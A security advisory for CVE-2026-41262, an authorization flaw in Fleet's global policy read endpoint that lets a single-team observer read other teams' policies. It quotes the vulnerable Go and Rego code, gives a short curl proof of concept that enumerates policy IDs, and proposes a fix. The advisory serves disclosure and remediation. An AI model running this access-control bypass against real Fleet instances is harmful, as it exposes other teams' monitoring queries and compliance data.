PT-2026-53001 · Go · Github.Com/Fleetdm/Fleet/V4
Publicado
2026-06-26
·
Atualizado
2026-06-26
·
CVE-2026-41262
CVSS v3.1
4.3
Média
| Vetor | AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N |
Summary
The global policy read endpoint (
GET /api/latest/fleet/policies/{policy id}) performs authorization against an empty fleet.Policy{} struct with nil TeamID, then fetches any policy by ID from the database without verifying the fetched policy actually belongs to the global scope. This allows a user with observer-level access on any single team to read the full details of policies belonging to any other team, bypassing Fleet's team isolation model.Details
The vulnerability is in
GetPolicyByIDQueries at server/service/global policies.go:163-180:go
func (svc Service) GetPolicyByIDQueries(ctx context.Context, policyID uint) (*fleet.Policy, error) {
// Auth check uses empty Policy{} — TeamID is nil
if err := svc.authz.Authorize(ctx, &fleet.Policy{}, fleet.ActionRead); err != nil {
return nil, err
}
// Fetches ANY policy by ID, regardless of team ownership
policy, err := svc.ds.Policy(ctx, policyID)
if err != nil {
return nil, err
}
// ... populates install software and run script, returns full policy
return policy, nil
}The authorization passes because the OPA rule at
server/authz/policy.rego:724-728 allows reading policies with null team id for any user who holds a role on any team:rego
allow {
is null(object.team id)
object.type == "policy"
team role(subject, subject.teams[ ].id) == [admin, maintainer, technician, observer, observer plus][ ]
action == read
}Since the auth object has nil TeamID, this rule fires for any team member. After authorization,
ds.Policy() calls policyDB() at server/datastore/mysql/policies.go:283-288 with a nil teamID:go
func policyDB(ctx context.Context, q sqlx.QueryerContext, id uint, teamID *uint) (*fleet.Policy, error) {
teamWhere := "TRUE" // nil teamID → no team filter
args := []interface{}{id}
if teamID != nil {
teamWhere = "team id = ?"
args = append(args, *teamID)
}
// ... executes SELECT with WHERE p.id = ? AND {teamWhere}This returns any policy regardless of team ownership, and the full policy object is returned to the caller without any post-fetch team verification.
By contrast, the properly-secured endpoints verify team scope:
GetTeamPolicyByIDQueries(team policies.go:421-428) setsTeamID: ptr.Uint(teamID)on the auth object and callsds.TeamPolicy()which filters by teamDeleteGlobalPolicies(global policies.go:255-263) explicitly checkspolicy.PolicyData.TeamID != nilafter fetching
PoC
Prerequisites: A Fleet instance with at least two teams. User A has observer role on Team 1 only. Team 2 has policies that User A should not be able to view.
bash
# Step 1: Authenticate as User A (Team 1 observer only)
TOKEN=$(curl -s -X POST https://fleet.example.com/api/latest/fleet/login
-H 'Content-Type: application/json'
-d '{"email":"team1observer@example.com","password":"password"}' | jq -r '.token')
# Step 2: Enumerate policy IDs (they are sequential integers)
# Attempt to read a policy belonging to Team 2 (e.g., policy ID 5)
curl -s -H "Authorization: Bearer $TOKEN"
https://fleet.example.com/api/latest/fleet/policies/5
# Expected: 403 Forbidden (user has no access to Team 2)
# Actual: 200 OK with full policy data:
# {
# "policy": {
# "id": 5,
# "name": "Team 2 Sensitive Policy",
# "query": "SELECT * FROM sensitive table WHERE ...",
# "team id": 2,
# "passing host count": 42,
# "failing host count": 7,
# "description": "...",
# "resolution": "...",
# ...
# }
# }Impact
An authenticated user with observer-level access on any single team can:
- Read SQL queries from all team policies across the Fleet instance, potentially revealing security monitoring strategies, compliance checks, and internal infrastructure details
- View host pass/fail counts for other teams' policies, leaking compliance posture data across team boundaries
- Access software installer and script metadata associated with other teams' policies via the
populatePolicyInstallSoftwareandpopulatePolicyRunScriptcalls - Enumerate all policies by iterating sequential integer IDs
This breaks Fleet's team isolation model, which is designed to restrict visibility between teams. Organizations using teams to separate departments, clients, or security zones would have their policy data exposed across boundaries.
Recommended Fix
Add a post-fetch check in
GetPolicyByIDQueries to verify the returned policy is actually a global policy (nil TeamID), consistent with how DeleteGlobalPolicies operates:go
func (svc Service) GetPolicyByIDQueries(ctx context.Context, policyID uint) (*fleet.Policy, error) {
if err := svc.authz.Authorize(ctx, &fleet.Policy{}, fleet.ActionRead); err != nil {
return nil, err
}
policy, err := svc.ds.Policy(ctx, policyID)
if err != nil {
return nil, err
}
// Verify this is actually a global policy — team policies must be
// accessed via the team-scoped endpoint which enforces team authorization
if policy.TeamID != nil {
return nil, authz.ForbiddenWithInternal(
"attempting to read team policy via global endpoint",
authz.UserFromContext(ctx),
policy,
fleet.ActionRead,
)
}
if err := svc.populatePolicyInstallSoftware(ctx, policy); err != nil {
return nil, ctxerr.Wrap(ctx, err, "populate install software")
}
if err := svc.populatePolicyRunScript(ctx, policy); err != nil {
return nil, ctxerr.Wrap(ctx, err, "populate run script")
}
return policy, nil
}Alternatively, re-authorize against the actual fetched policy object so OPA rules properly evaluate team membership, similar to how other Fleet endpoints handle object-level authorization.
Correção
Incorrect Authorization
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Github.Com/Fleetdm/Fleet/V4